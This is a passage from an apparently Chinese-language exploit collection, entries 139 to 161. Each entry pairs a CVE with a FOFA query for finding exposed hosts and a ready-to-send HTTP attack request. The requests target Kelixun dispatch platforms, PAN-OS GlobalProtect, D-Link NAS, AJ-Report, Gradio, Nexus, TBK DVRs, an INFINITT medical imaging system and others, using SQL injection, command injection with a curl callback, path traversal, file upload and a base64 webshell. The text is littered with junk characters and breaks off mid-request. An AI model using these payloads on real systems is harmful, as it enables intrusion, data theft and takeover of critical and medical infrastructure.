139. 福建科立讯通信指挥调度平台editemedia.php sql注入; f* W+ q, _+ d9 u4 D
CVE-2024-2622) U, z3 g' D. O2 R+ K
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
, W* _$ N" O6 z# F6 o6 U- lGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1( v) M7 l1 @5 {# y
Host: x.x.x.x, k, Q4 d I5 x0 A, H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 k6 \" R) e, m) D' M& s2 m9 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: y9 f) C W+ Y T: ?! d! OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( Z$ p! h& @. x& u) H
Accept-Encoding: gzip, deflate, br
6 s; x' R8 `* c9 y% g X+ I. cConnection: close, K4 U; K6 _5 x: d& p! g
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk: v4 k7 p: \! Z& o+ a) f7 \+ ]
Upgrade-Insecure-Requests: 13 h5 x8 J0 _3 I# b- ?" ^
; y' U6 C6 t: n X$ k( O0 e% @7 h
9 b; N2 ?/ o7 ~ w
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
9 K% P' B8 b6 H7 b# ?1 O5 |CVE-2024-2566* X% L9 Y- J9 ~4 S2 S _$ W8 w( b3 O
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
3 q" N# u0 z7 S5 d8 xGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
* p$ s; H7 O+ F# I, yHost: x.x.x.x
5 R/ |' R+ i* [2 W' W0 H3 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. [7 z* t/ t. [- A3 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 t9 y! G4 s' b1 _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ n! J. T, Q m5 y& F- WAccept-Encoding: gzip, deflate, br" L0 i! P1 d- n1 `9 L" ?1 Q+ b- p0 w
Connection: close- M0 i8 o, X& U3 }* ~2 d
Cookie: authcode=h8g9
* Q& U) C( b3 B" k' p3 o4 D5 kUpgrade-Insecure-Requests: 1
+ D' i" J" e' m! s$ G7 C! B% X- Y6 E
7 ~' I/ Y" y! l) U w141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
/ F- c3 J& S$ U0 i6 T7 fFOFA:body="指挥调度管理平台"' v; `6 g5 x7 U7 r
POST /app/ext/ajax_users.php HTTP/1.14 P+ n9 F. N4 B s( ^1 |# q
Host: your-ip
2 M1 S o }( P7 @% ]- V2 SUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
4 h6 n- J. S" z' dContent-Type: application/x-www-form-urlencoded
8 [% n" |% A* n6 s/ D C1 O! x) z1 ]7 W4 K7 y l) v7 W% j: Z z- y V( S
4 t2 S! z- M8 T X7 hdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -: K1 t- P; z& ]2 y$ W% `' S7 D& Q
6 z/ K! l9 z& P& i+ `( X: t$ Q
" ?* Y {) {" w142. CMSV6车辆监控平台系统中存在弱密码, m' ?4 s# _3 m, y
CVE-2024-29666
4 P) ?" a( d7 B& JFOFA:body="/808gps/"/ ?( n+ T$ v/ n) m' ^
admin/admin" v- a( ?( h; r, m5 f# {' |
143. Netis WF2780 v2.1.40144 远程命令执行
7 g1 ?- E5 N& U2 n) ]CVE-2024-25850
+ ^ m8 n& k- d9 w+ Z5 h- NFOFA:title='AP setup' && header='netis'
5 i* k5 n7 r; F! [2 [' y9 c7 qPAYLOAD
6 n! j# L7 X* {3 o, X+ J5 R; e( Y& v1 j& `! ]7 P
144. D-Link nas_sharing.cgi 命令注入: S1 ^ ~4 a; d6 f
FOFA:app="D_Link-DNS-ShareCenter"9 O/ f! G5 ^" U* q; y* u3 Z
system参数用于传要执行的命令' j. A% U* V/ b/ G1 c( u
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
3 b1 V9 S2 \4 G) \Host: x.x.x.x
8 |5 x- n0 h) s! R( k/ n& uUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
* [$ g, p+ l) T ^7 b- s/ Z; L$ nConnection: close
+ U* ~7 K# O* h$ D2 E0 z3 `Accept: */*2 f0 J" M2 }3 ?/ z4 b- d
Accept-Language: en1 e' n- y" w ~& |
Accept-Encoding: gzip
- U+ Y1 z0 w+ n0 X6 ]$ {2 l5 P$ O: c4 R+ Y( X+ u
0 H. R T+ f1 ^, Y/ P) x2 w; S' ]. U
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
. S) j3 H/ l3 G; a: g" f& |' qCVE-2024-3400
, ^5 W8 R* b! BFOFA:icon_hash="-631559155"
/ I' n. R7 P1 Q+ RGET /global-protect/login.esp HTTP/1.1- s9 q% [4 C5 @% O, d2 F5 U' w
Host: 192.168.30.112:1005
0 e. y) r+ S) o8 ]# f1 \9 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84( U3 f" D; P+ a- Z# A9 N
Connection: close' B. N5 e/ V) E8 [
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;. Y1 D( |. O7 {, A: e4 x3 E
Accept-Encoding: gzip
1 ?2 T* L0 Q2 Y: G1 y8 x( ]
d( n8 R+ ~: o
! |8 N: K2 Q. a7 h- R b' S6 O/ b146. MajorDoMo thumb.php 未授权远程代码执行
! I- } [+ ?* H! p! ACNVD-2024-02175
: p$ T: a; D( c [( X5 oFOFA:app="MajordomoSL") y6 K& s4 S2 d# J1 ^0 o5 s( T
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
& [# ?& C; H9 h8 T/ t2 pHost: x.x.x.x5 d, `+ l/ i) _' ~7 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
5 ?' M! f" y6 K9 ~* GAccept-Charset: utf-89 R9 r: `8 [2 m# o6 ^
Accept-Encoding: gzip, deflate1 [5 N& Z0 {3 t4 G6 X; o
Connection: close% p) W3 y& A2 w% }6 P5 @
$ U+ K' Y' c! a1 h+ \% T5 P% y: G' F. \! Q! a" j* T
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历, E5 W! Z+ Q6 P% W+ T5 {
CVE-2024-32399' S8 t! |+ ^7 v& a
FOFA:body="RaidenMAILD"
6 A" _* }3 z/ \3 b: YGET /webeditor/../../../windows/win.ini HTTP/1.16 z) Y; F' f6 |' \
Host: 127.0.0.1:81& h! O# f+ M0 N! n- c$ z
Cache-Control: max-age=0
) G3 h0 z5 ~: [; cConnection: close
u0 ~% O7 d9 V5 S( k A& B% P7 Z0 h( {
5 q! \4 m& K( d
148. CrushFTP 认证绕过模板注入. q% ~5 d- Y: v
CVE-2024-4040
8 t/ H- q, V o1 T& mFOFA:body="CrushFTP"
' m Y7 A% z b% m# APAYLOAD6 Y$ l6 W# R& K' E& E& S' d
) N( Q1 x! Q n& n# {) ?149. AJ-Report开源数据大屏存在远程命令执行7 @+ r, Y( E2 Z
FOFA:title="AJ-Report". y1 `, X, ?7 w$ I5 m: o; j' ?$ A* T
% U' F& G+ [# g" K5 k
POST /dataSetParam/verification;swagger-ui/ HTTP/1.10 l. ^$ d3 ^3 Q0 P! M- {
Host: x.x.x.x7 ~$ P% o! T& u& g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 d) P: O# `5 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ |: N4 ] h4 O+ e/ z# y% e4 R: Q
Accept-Encoding: gzip, deflate, br F- f) S7 G; W# O
Accept-Language: zh-CN,zh;q=0.9
" e4 ]1 S, ]% `' y# jContent-Type: application/json;charset=UTF-8! e% S! O; B# k3 P! C
Connection: close m+ |- A/ X+ S" m+ P7 y$ }
8 R i6 w% Z" j3 [2 X{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}! {7 x% b% Z% }% x2 Q
" W7 h+ [/ ~8 V6 N% o150. AJ-Report 1.4.0 认证绕过与远程代码执行- G+ R7 ?6 b" c4 f# q% \3 G/ n
FOFA:title="AJ-Report"% P9 B) c% g! Q$ X
POST /dataSetParam/verification;swagger-ui/ HTTP/1.18 c1 q4 ~- u0 q" g
Host: x.x.x.x3 |- e; ^$ [; E) ~8 v5 F8 H+ x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 U9 m% K0 U( E. R1 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. ^# t. G" a WAccept-Encoding: gzip, deflate, br8 p! x4 [: A' f5 ]' Y/ S1 t9 {, h
Accept-Language: zh-CN,zh;q=0.93 a; F# x/ w% [7 @! D* h8 \) I
Content-Type: application/json;charset=UTF-8
8 e4 P4 z# x" j& cConnection: close
& R% y# i" y1 HContent-Length: 339
3 e! Y. u4 g6 L/ x# `1 ^# |# G3 s6 ^1 P8 Q/ o$ W
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}0 h! m, z( [* b" G( N8 ]
0 S* i8 X3 B; u ^# W/ \
! k6 x7 | _9 ?( S1 u151. AJ-Report 1.4.1 pageList sql注入5 ]+ H' U: g' T/ l4 K
FOFA:title="AJ-Report"5 K. J6 r3 U2 S
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1# x% k% V$ d( ]( r/ [( X& Z: }
Host: x.x.x.x% N/ A; T7 i0 e+ G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 W) G M( O% F) n8 B1 I
Connection: close! E, ]8 w5 p- M8 k) r8 H
Accept-Encoding: gzip
( D5 k3 r0 m$ o+ Z! V# r
2 z# e. w3 q! ^2 A; l3 ]! \
; ^7 w- n8 H- ~# {0 ^1 I/ C7 x152. Progress Kemp LoadMaster 远程命令执行
- y* R2 i$ W' t) S% lCVE-2024-1212. d8 O4 s( L. G4 R
LoadMaster <= 7.2.59.2 (GA)
' O$ M8 H' I/ h2 v* e4 PLoadMaster<=7.2.54.8 (LTSF)) ^ h& e- T: c; w
LoadMaster <= 7.2.48.10 (LTS)
6 S. g' a. x: M L7 l( IFOFA:body="LoadMaster"8 Q( ]: |' d: j1 F) z: _
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
; b% i# n. `' `0 Z" ?* PGET /access/set?param=enableapi&value=1 HTTP/1.1! l* \6 h) K# `& k
Host: x.x.x.x
. h9 S8 i4 Q8 o7 O7 K9 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.15 Z8 ]0 h7 l& F8 N) F
Connection: close! h2 O3 x8 t, e( n' x
Accept: */*6 V" Y0 O3 w' L
Accept-Language: en- _% t* n; D8 j( f; M0 C
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
- n& I+ v8 ~0 A3 P2 V J: ^Accept-Encoding: gzip9 C# o z. O. C4 N5 {2 m
0 [& {, P2 e4 e2 z/ S. L2 @! D
2 n, u9 g* e/ [, K
153. gradio任意文件读取 b: l6 x: D5 m D, r( E5 e
CVE-2024-1561FOFA:body="__gradio_mode__"* K" D, E. J8 T; A C5 [$ |
第一步,请求/config文件获取componets的id
! M( b0 l4 @! d. K* Ohttp://x.x.x.x/config
+ T$ r' p6 ^9 c Q$ m7 ^3 s
. L* E1 O) ?6 M [( Z3 }2 w: [/ G: X. ]8 ?
第二步,将/etc/passwd的内容写入到一个临时文件
5 J2 b2 @* |8 y9 v9 u# Z- s* LPOST /component_server HTTP/1.1/ h7 r5 k$ x8 g/ r. ~. \2 j3 c0 e
Host: x.x.x.x
- ^ a9 ]7 U. sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
. [ H7 g& {4 r% o8 t2 NConnection: close
& t$ \. {* ^& M' d' I! ^) f+ j1 Z( LContent-Length: 115+ {6 L7 o. X" ?0 h0 g- @& G
Content-Type: application/json
- T6 q0 V4 Z0 z/ k" pAccept-Encoding: gzip
! T1 C% W% T5 q. S
4 R# `3 Y0 O+ `5 ?2 E{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}$ [2 o1 r; B) e0 }) [' L! ^8 u
8 V# c4 G: Q8 ^7 K! v& }4 T
: {" H, P' q7 n. ?! J
第三步访问/ N+ m5 a" x) ~! |$ ? U" o
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd7 h8 R* H7 w6 H
* b1 @( |) _8 j6 D' R5 p( X& J% @
+ W1 T% U# k, Z! R9 O6 d6 x$ B" A# k154. 天维尔消防救援作战调度平台 SQL注入
3 Z4 u* i, d8 b+ W' PCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
" j5 B n: M) c; a$ e8 EPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
, y3 E$ T2 e' a! u! P$ z2 FHost: x.x.x.x4 C0 }7 J+ e7 w; R9 D- I
Content-Length: 106
( C4 n, y* z0 h% ?8 ACache-Control: max-age=0
3 t1 G! N0 K& ]8 Q- k0 V* P5 vUpgrade-Insecure-Requests: 1
, e2 n% W) y! q+ V$ s( p4 s* E6 @) h$ G; TOrigin: http://x.x.x.x+ k9 t* T7 _0 U# Q0 G
Content-Type: application/json
3 {$ F5 a1 }+ c8 m2 Q1 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
, m m$ L$ \: w: }/ f, P6 T' G: J: m0 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" w* c( L0 u: Q6 |2 y4 B
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page5 L; G! ?# z- S
Accept-Encoding: gzip, deflate% d: N/ u- D0 H) J$ p5 _
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
6 q0 J5 q( [# y7 ~; PConnection: close( s5 |% F9 q. K; S, R# ^
# G. L7 @; Y+ t( X3 y{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}" h3 \0 N& I. w! z7 Q, G7 t" t; n
' H3 ]2 ~ j, s3 j* x2 _
& }; H: k" \3 D2 M155. 六零导航页 file.php 任意文件上传6 [: k" w+ Y' Y) o- {+ L
CVE-2024-34982
5 E! p5 U# y4 ?0 i$ v1 G& YFOFA:title=="上网导航 - LyLme Spage"
5 h7 h6 J% ^: }9 x, l0 C t- _3 w4 H5 pPOST /include/file.php HTTP/1.1
, D* w6 z' ^7 |" VHost: x.x.x.x
+ S$ Q* l) r7 a1 y$ d, v5 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
0 ?4 A2 W+ Y6 h* fConnection: close n5 k6 e% |/ v Q0 D. W; Z+ J
Content-Length: 232
. J& X& H" ] F8 a/ K9 k& aAccept: application/json, text/javascript, */*; q=0.01/ ]/ v2 T8 ?; M# G) l+ Y
Accept-Encoding: gzip, deflate, br* |4 T; [ \' R1 t5 ?. z8 j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" l5 h2 e! ~, X6 G7 D! _
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f+ ~$ c- y3 R b. f0 X, ?3 n
X-Requested-With: XMLHttpRequest, E$ @% T9 c1 w Q
1 x8 T9 w9 n& D( v
-----------------------------qttl7vemrsold314zg0f
7 @9 g$ f: I3 ~9 E1 L9 \Content-Disposition: form-data; name="file"; filename="test.php"
. _' ~3 s1 n: M; G5 p7 TContent-Type: image/png
1 s' [5 C2 C, m% n& W# @8 i g% |: n9 n& B* ]0 e$ {/ G
<?php phpinfo();unlink(__FILE__);?>- z, A8 X9 V9 i7 V, N2 c
-----------------------------qttl7vemrsold314zg0f--
& {8 p `( E8 ]0 b* ~6 u/ Z" |# }; V4 C* R0 N$ }8 H
+ T" @+ v% o/ \* g
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php2 G! e: j; z5 ]) E
. R/ ]4 @& B$ p" e. i9 ?
156. TBK DVR-4104/DVR-4216 操作系统命令注入
\* p+ x3 P$ e- H8 yCVE-2024-3721# ]$ f: k4 _/ Y) A' ]) ?
FOFA:"Location: /login.rsp"
2 x1 O. m2 t1 D z8 v) B7 R2 B·TBK DVR-41042 m: j2 ^8 \0 r; ?" z! l
·TBK DVR-42166 H6 i9 l/ n* E! o
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
; Z" j( u3 O! a( w. {7 m' K- S0 s- r. R9 G0 E3 P& a
3 V- [0 e8 b, w# d! [POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.19 v! M. F# ]7 a
Host: x.x.x.x
% I s# l4 A b+ t( Y7 Q# zUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ ?/ d1 l) |2 b3 X* `
Connection: close9 R6 p/ y! h" A% U
Content-Length: 0
9 j# W- [- N) I$ {$ m4 {Cookie: uid=1
" ~" @* D# F# p1 r5 _Accept-Encoding: gzip
* R; C, v7 }8 m* O; B" ^% E
- x, N M- j/ H% \8 h9 s/ w1 B0 _5 j3 b
- b: c! a3 `1 Y& t" m. v/ \157. 美特CRM upload.jsp 任意文件上传
' Q4 J- O3 B" a% {6 F4 J9 J# YCNVD-2023-06971
( w8 {2 x- s T3 Y- P5 dFOFA:body="/common/scripts/basic.js"8 i- D7 q$ e# l$ g1 u8 T! g
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
8 ?' F- m ^, v4 }7 sHost: x.x.x.x. k& b& `! d) x/ L, g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
% b3 s2 ?2 P3 dContent-Length: 709
+ f6 Z( |% y0 R8 p8 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# x& P$ g% ~6 r2 X& V: M+ H
Accept-Encoding: gzip, deflate( K4 _: X, y$ Y4 X" l; K7 {% K1 g; ?
Accept-Language: zh-CN,zh;q=0.9( w8 B2 M4 x2 C1 E" \$ T9 m8 q5 H
Cache-Control: max-age=0* J6 v* u# m7 N* A- X0 S
Connection: close
8 T: [; q* z8 c% m" U, o9 y7 S& P* bContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN" y* I A8 C2 b) j* e# E
Upgrade-Insecure-Requests: 1( W' Z: e8 _ W; h
. {# e: ~/ i& r
------WebKitFormBoundary1imovELzPsfzp5dN
7 [. z1 a6 i& C# vContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"! j: z7 L% q$ ^/ v8 r7 |
Content-Type: application/octet-stream
! {* T# Q! K) e
! \2 _1 }" e* K2 n4 I. Inyhelxrutzwhrsvsrafb( H$ g1 L1 i' V1 k) X
------WebKitFormBoundary1imovELzPsfzp5dN' O9 ?' C, r3 _9 F ?
Content-Disposition: form-data; name="key"% q7 Q( x* X Z/ ]8 W
% g$ L% Q5 m+ j. E
null
9 {; G' O! O" L+ V5 b------WebKitFormBoundary1imovELzPsfzp5dN7 T$ w3 r7 y, \4 a+ G
Content-Disposition: form-data; name="form"
" c5 T" }$ {3 l; u, ^- d' {- D- J& o& c
null+ C* C$ ?- T+ ^) T" o+ s# F( y
------WebKitFormBoundary1imovELzPsfzp5dN
5 @4 c! |9 ]/ NContent-Disposition: form-data; name="field"
4 F, b! Y5 ^. _: ]0 Y+ y0 d1 t# c7 z% V
null, n6 C( S% `* v9 y, q
------WebKitFormBoundary1imovELzPsfzp5dN
, k9 B3 b( m2 A7 U! z) g1 }: \( ZContent-Disposition: form-data; name="filetitile": Z' P2 h# F1 Y9 f& F
% H" y3 P& e) y. Z* b$ a( i: Anull) u3 h1 N+ i5 ~: l
------WebKitFormBoundary1imovELzPsfzp5dN
$ ~) U. y1 o0 d6 Z! r" f& sContent-Disposition: form-data; name="filefolder"
+ J! D: o- a# G9 L* X1 I, ]( M8 r/ o3 J' _2 _: z$ x
null
3 m; w9 c# m( s& A$ ]------WebKitFormBoundary1imovELzPsfzp5dN--! Q, ^" F! m# i, i3 f8 z8 n
# h% w7 ^: O3 r9 G
2 f1 q) x4 S7 F- n6 f; V
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp h" ~; \2 V# B3 O! R
7 i( w) c- L: n( w3 r
158. Mura-CMS-processAsyncObject存在SQL注入
6 S5 {& ^) _. e' y9 s' GCVE-2024-32640
; C+ l0 r* v5 H* x9 E& g. W/ UFOFA:"Generator: Masa CMS"
& t/ Z# t8 r' L: E8 W: _POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.10 Q6 v4 O+ r, x7 A g! s, M0 S
Host: {{Hostname}}4 \0 ~* J. b, q/ w1 C% o
Content-Type: application/x-www-form-urlencoded+ b7 Y1 i; P' A9 r0 c' d
4 X) ?. \8 o( k/ a1 I) U
object=displayregion&contenthistid=x\'&previewid=1. n' R9 E7 n: R- x& O/ f2 t% ]2 {
8 V$ E4 k, W& ~3 T; {! L9 v2 b! b; O: p$ A0 ?
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传. l$ C) p& ]1 H/ L& l8 ^0 g6 \, a) N
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
7 m d a" J+ t& k& o9 i6 ]1 EPOST /webservices/WebJobUpload.asmx HTTP/1.1; ?0 v3 K' E$ f
Host: x.x.x.x; P+ C, b1 f, s0 |# r8 e8 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36; I9 k) u) [% Z4 a
Content-Length: 10808 T/ m6 p# n7 Y/ X P
Accept-Encoding: gzip, deflate
& }7 d# g& R& UConnection: close
$ Z1 @7 C4 ? R) S5 T1 }Content-Type: text/xml; charset=utf-8/ b4 ]3 k+ n% ~& j1 N1 F
Soapaction: "http://rainier/jobUpload"
% r! ]& T5 q+ j) x0 j$ [' E q1 A' d) f8 L2 T
<?xml version="1.0" encoding="utf-8"?>
1 R: D" ]3 U0 J+ r<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
- S4 N; ~, ~9 i+ {9 u8 u<soap:Body>. N- e J& [2 |- H
<jobUpload xmlns="http://rainier">
+ W; A3 V: r7 t/ O<vcode>1</vcode>% | Q. I3 I# F
<subFolder></subFolder>
9 z6 t3 O0 _0 K<fileName>abcrce.asmx</fileName>
. {' r0 F! `$ n# Y. _, b- {7 P; o<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
& j3 h7 p7 x& d) u+ J% @: S</jobUpload>
7 B J' t# _( H3 F</soap:Body>
[ A m5 B; Y7 E4 U$ v0 d</soap:Envelope>" [- V4 o+ _0 m9 F& Q
2 m! ?. ?' F2 o7 X
" g( X0 c; L/ H; C5 l/ I/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")" c/ n# q; ~9 F& d
$ L% K8 y8 f0 h% H6 p% r- {0 b
8 u- p- \/ f% T# Y0 _, t$ l160. Sonatype Nexus Repository 3目录遍历与文件读取
. b/ c/ M& x5 \/ JCVE-2024-4956
! E# P! L2 f6 C" B5 RFOFA:title="Nexus Repository Manager"
/ z* ^6 \0 f/ A/ rGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
( B5 r+ ^1 X! X4 r! e$ |Host: x.x.x.x
7 S7 l; ~0 F/ ^# V( p lUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
/ ]9 b) G m& q! b! H1 JConnection: close
/ g: H5 o3 D) X" M* g6 x, oAccept: */*
) \+ y& A; r* @ C6 s* T/ c$ Z9 g; bAccept-Language: en4 k+ v( _8 |( p5 C( }0 I2 d
Accept-Encoding: gzip0 R7 O" r% c, c9 q
, i" S& f' z) ]9 m0 n; {: i( G! L( g9 ^& |# |' `+ S" k; J- U5 b
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传( k& B7 R8 f o" M
FOFA:body="/KT_Css/qd_defaul.css" q: g7 V* P/ F
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密! s, K# a& o* F2 m- b2 K
POST /Webservice.asmx HTTP/1.1# M" M" y' A) C& e9 G: C( T& j; J
Host: x.x.x.x) u+ X( J: Y. o+ p& Z" O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.362 j8 p- k9 A9 V: y2 X
Connection: close0 C5 u- A5 A) a- r
Content-Length: 445% [! f, B6 I1 z, z! `
Content-Type: text/xml; k `. w& S6 j4 F: T
Accept-Encoding: gzip; u: ^! A: X* z3 W4 p+ ]
8 m* v |2 s p. n6 @/ W, x5 G, R
<?xml version="1.0" encoding="utf-8"?>% ?2 I1 E* E8 @( p" x X7 `
<soap:Envelope xmlns:xsi="
